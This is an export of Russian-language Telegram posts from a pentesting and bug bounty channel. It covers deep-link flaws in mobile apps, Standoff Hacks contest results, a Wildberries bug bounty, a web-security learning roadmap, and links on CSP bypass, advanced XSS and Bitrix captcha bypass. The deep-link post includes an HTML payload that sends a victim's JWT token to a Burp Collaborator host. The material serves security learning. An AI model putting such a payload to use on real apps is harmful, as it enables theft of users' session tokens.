Forwarded from Похек (Sergey Zybnev)
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
#xakep #cloudflare
💬 Канал | 📡 Хакер | ➡️ Более подробная информация
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
#xakep #cloudflare
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯12👍4
Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
<a href="keklol://url=https://burp_collab">click</a>
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking
ЧТНП | #mobile
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥4❤3
Forwarded from Information Security Memes
This media is not supported in your browser
VIEW IN TELEGRAM
😁31👍1
Forwarded from Standoff 365
🤩 Конкурс инвайтов на Standoff Hacks за лучшие материалы о прикладной безопасности завершен!
Талантливые авторы присоединятся к нашему priv8-ивенту, который пройдет 26 ноября в рамках Moscow Hacking Week.
Пять инвайтов мы разыграли за самые крутые статьи. Вот ники победителей и их темы:
1. whoamins. «Обычный Client Side с необычной эксплуатацией»
2. qwqoro. «E-mail Injection»
3. iSavAnna. «Не все "ошибки" одинаково полезны — с точки зрения безопасности»
4. Ivan. «Как не стоит обрезать изображения. aCropalypse (CVE-2023-21036)»
5. Firewall. «Как ломать сайты на 1С-Битрикс»
Один бонусный, шестой, инвайт — за видео «Гайд по рекону в багбаунти для новичков», его получает lifei8hitt.
А еще свою статью «Анализ прошивки» прислал superhacker123 — она вышла достойной, но ее автор получил инвайт еще до конкурса 😉
Все работы скоро будут опубликованы на Хабре (следить за обновлениями можно здесь) — они помогут специалистам по кибербезопасности стать еще сильнее (и, возможно, принять участие в следующем Hacks). С заслуженной победой! 👏
Талантливые авторы присоединятся к нашему priv8-ивенту, который пройдет 26 ноября в рамках Moscow Hacking Week.
Пять инвайтов мы разыграли за самые крутые статьи. Вот ники победителей и их темы:
1. whoamins. «Обычный Client Side с необычной эксплуатацией»
2. qwqoro. «E-mail Injection»
3. iSavAnna. «Не все "ошибки" одинаково полезны — с точки зрения безопасности»
4. Ivan. «Как не стоит обрезать изображения. aCropalypse (CVE-2023-21036)»
5. Firewall. «Как ломать сайты на 1С-Битрикс»
Один бонусный, шестой, инвайт — за видео «Гайд по рекону в багбаунти для новичков», его получает lifei8hitt.
А еще свою статью «Анализ прошивки» прислал superhacker123 — она вышла достойной, но ее автор получил инвайт еще до конкурса 😉
Все работы скоро будут опубликованы на Хабре (следить за обновлениями можно здесь) — они помогут специалистам по кибербезопасности стать еще сильнее (и, возможно, принять участие в следующем Hacks). С заслуженной победой! 👏
❤🔥15🔥4❤1
Победа 😎
Буду вещать вам с хакса ❤️
Также если будет можно, то и новые статьи про баги с баг баунти буду публиковать🦔
Буду вещать вам с хакса ❤️
Также если будет можно, то и новые статьи про баги с баг баунти буду публиковать
Please open Telegram to view this post
VIEW IN TELEGRAM
❤23
Forwarded from wr3dmast3r vs pentest
Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒
Настройка, использование и способы обхода защиты🐈
https://telegra.ph/Content-Security-Policy-10-31
Настройка, использование и способы обхода защиты
https://telegra.ph/Content-Security-Policy-10-31
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Content Security Policy
Что такое CSP? Content-Security-Policy или CSP — это встроенная технология браузера, которая помогает защитить от атак, таких как межсайтовый скриптинг (XSS) . Она перечисляет и описывает пути и источники, из которых браузер может безопасно загружать ресурсы.…
👍8🔥2❤1
Наконец-то, спустя 7 лет вышел новый топ 10 по мобилкам
Вот как это теперь выглядит вкратце:
Happy hacking
ЧТНП | #mobile
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥3❤1
Forwarded from RPPA PRO: Privacy • AI • Cybersecurity • IP
#podcast #НеДляГалочки
Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄
ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.
💡 Apple, Яндекс
🎤 Ведущие выпуска:
🔵 Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead
🔵 Елизавета Дмитриева, data privacy engineer в российском инхаусе
🆕 Помогали справиться с кошмаром:
🔵 Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.
🔵 Елизавета Никулина — директор по маркетингу и PR в Awillix
Обсудили:
⬇️ Векторы атак
⬇️ Жизненный цикл утечек данных
⬇️ Последствия утечек для человека
⬇️ Реагирование на инциденты, а том числе PR-позиция компании
⬇️ Немного коснулись базовой инфобезной терминологии
Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером
ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.
Обсудили:
Please open Telegram to view this post
VIEW IN TELEGRAM
Apple Podcasts
Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером
Podcast Episode · Не для галочки - подкаст о приватности · 09/11/2023 · 1h 19m
👍8❤1
Привет! Решил опубликовать свой подход к изучению веб приложений. Этот подход я сформировал на основе матрицы компетенций которую прикреплю в конце, и на основе зарубежных роадмапов по изучению вебки. Шел я по нему года 2, если не больше, до этого был другой подход, до конца еще не дошел. Можно было и короче, но я часто
Необходимо знать как устроен cors, sop, csp и т.д. с ними нужно научится работать и не много понастраивать
Под механизмами я имею ввиду базовые элементы веб приложения такие как: аутентификации, авторизация, поиск и т.д. Их нужно научится программировать на любом языке который связан с вебом
Изучение базовых технологий веба, такие как jwt, oauth, sso и др, нужно научится с ними работать, желательно кодить, также разобраться с тем как они устроены.
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
❤19👍8
Стоит начать изучать к примеру рекомендации по защите jwt от owasp и других комьюнити
К примеру: laravel, django, bitrix и т.д.
Изучение разных архитектур, например: serverless, SPA и т.д.
Это поможет тебе понимать веб приложение стоящие перед тобой - полностью или хотя бы частично
К примеру: если при написании функционала разработчики везде в коде используют старый DOMPurify для защиты от XSS, то это приведет к уязвимостям во всем функционале, т.к. старый DOMPurify был уязвим к mXSS уязвимости
Или используется принцип "хранить все яйца в одной корзине", к примеру ты нашел CDN, прошерстил папки и файлы и нашел конфиденциальные данные пользователей
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍6
Привет! Хакс закончился а впечатления остались, щас ими и поделюсь и расскажу что было:
Примерно неделю, а может и больше мы ломали приватный скоуп в ВК и Тинькофф
Скоуп был на уровне не плохо но и не ужасно, я к сожалению в эти недели болел и по большей части
Оффлайн встреча прошла круто, задарили куча мерча и тот самый мемный пивас от standoff 365 только черный
Мерча было на 3 пакета, подарили: большой ковер для компа от тинькофф, 2 худи, 1 футболка, заглушка на камеру, маячок для вещей со слежкой по gps(интересно будет зареверсить хех), шапка, шарф, брелок с проводами для телефонов, повербанк прозрачный, подушка для сна в езде с эффектом памяти, мешочек, наклейки. В общем одежды задарили на 3 года вперед, можно даже и в магазин не ходить
Также был огромный шведский стол с пиццей, круассанами, креветками, чай, кофе - в общем вкусно
Под конец на втором этаже был бесплатный калик а также караоке и пару игральных автоматов на первом этаже.
В общем и целом - все прошло круто, куча мерча и полезного опыта, если будет возможность попасть как-то на хакс - рекомендую
ЧТНП | #блабла
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20❤5👍2
Forwarded from Standoff 365
Такое уже было на августовском Standoff Hacks, когда за поиск уязвимостей в закрытых программах компания выплатила больше 4 млн ₽.
А с сегодняшнего дня маркетплейс запускает собственную багбаунти-программу на Standoff 365. Уязвимости можно искать на всех «ягодных» ресурсах: *.wildberries.ru, *.wb.ru, *.paywb.com, *.paywb.ru, *.wb-bank.ru.
Самое большое вознаграждение за баги, найденные в основном скоупе, — 250 000 ₽. Здесь предстоит проверить веб-версию и приложения маркетплейса и портала продавцов, сервис «Всем работа», платежный шлюз (только веб) и Balance Pay (только мобилки).
Остальные ресурсы включены в дополнительный скоуп, там максимальное баунти в два раза меньше.
😲 Отдельный сценарий — взлом личного кабинета тестового продавца. Если тебе это удастся, получишь 500 000 ₽.
Больше информации — в программе на сайте. Читай, изучай, ломай. Верим в тебя!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤3🔥3
Привет! Если ты ещё не находил RCE на баунти и задумывался как было бы здорово получить не дубль и много деняк, то это видео приоткроет завесу тайны об RCE.
В этом видео: разбор кейсов с баг баунти, где, в каких механизмах, и при каких обстоятельствах находили RCE...
Happy hacking
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍6❤🔥1
С наступающим новым годом, граждане пентестеры ❤️
Я наконец-то ожил, как вы поживаете и как новогоднее настроение в целом? Пишите в комментариях
В этом году нас стало аж 1700+ несмотря на то, что каналу и год нет, за что большое спасибо🥰
Также было несколько крутых конференций, новый опыт в баунти и плюс скилл, также куча нового мерча
Буду стараться вас радовать новыми полезными публикациями чаще чем это было и более качественней
Будем и дальше поднимать скилл, расти и покорять новые вершины☺️
Я желаю в новом году всем вам хорошего настроения, сильной мотивации для исполнения всех ваших идей и мечтаний, а также новых хороший людей на вашем пути. Ваш Что-то на пентестерском 💫
Я наконец-то ожил, как вы поживаете и как новогоднее настроение в целом? Пишите в комментариях
В этом году нас стало аж 1700+ несмотря на то, что каналу и год нет, за что большое спасибо
Также было несколько крутых конференций, новый опыт в баунти и плюс скилл, также куча нового мерча
Буду стараться вас радовать новыми полезными публикациями чаще чем это было и более качественней
Будем и дальше поднимать скилл, расти и покорять новые вершины
Я желаю в новом году всем вам хорошего настроения, сильной мотивации для исполнения всех ваших идей и мечтаний, а также новых хороший людей на вашем пути. Ваш Что-то на пентестерском 💫
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥27👍3❤2
Минут 10 назад узнал что оказывается есть ежегодный список топ каналов по ИБ, оказалось что и мы там есть 🦔
Большое спасибо кто дал рекомендацию ❤️
Большое спасибо кто дал рекомендацию ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥30👏3👍1
Forwarded from wr3dmast3r vs pentest
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей💎
https://telegra.ph/XSS-Advanced-Level-01-09
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей
https://telegra.ph/XSS-Advanced-Level-01-09
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
XSS Advanced Level
Я часто встречаю XSS, которые не дают возможности использовать что-то кроме вызова алерта, или какие-нибудь Self-XSS без возможности эксплуатации. Однако, если приложить достаточно усилий, то можно докрутить даже многие Self-XSS, используя их в комбинации…
👍10❤1
Привет! Теперь я могу выложить статью с помощью которой проскочил на Standoff Hacks. Также команда standoff 365 помогла её отредактировать, за что большое спасибо и теперь я выложил её на хабр
Краткое содержание статьи
Приятного чтения & Happy hacking
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤🔥6🔥1
Привет! Решил опубликовать на хабр своё старое исследование на тему как обходить капчу в битриксе
Краткое содержание статьи
Приятного чтения & happy hacking
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1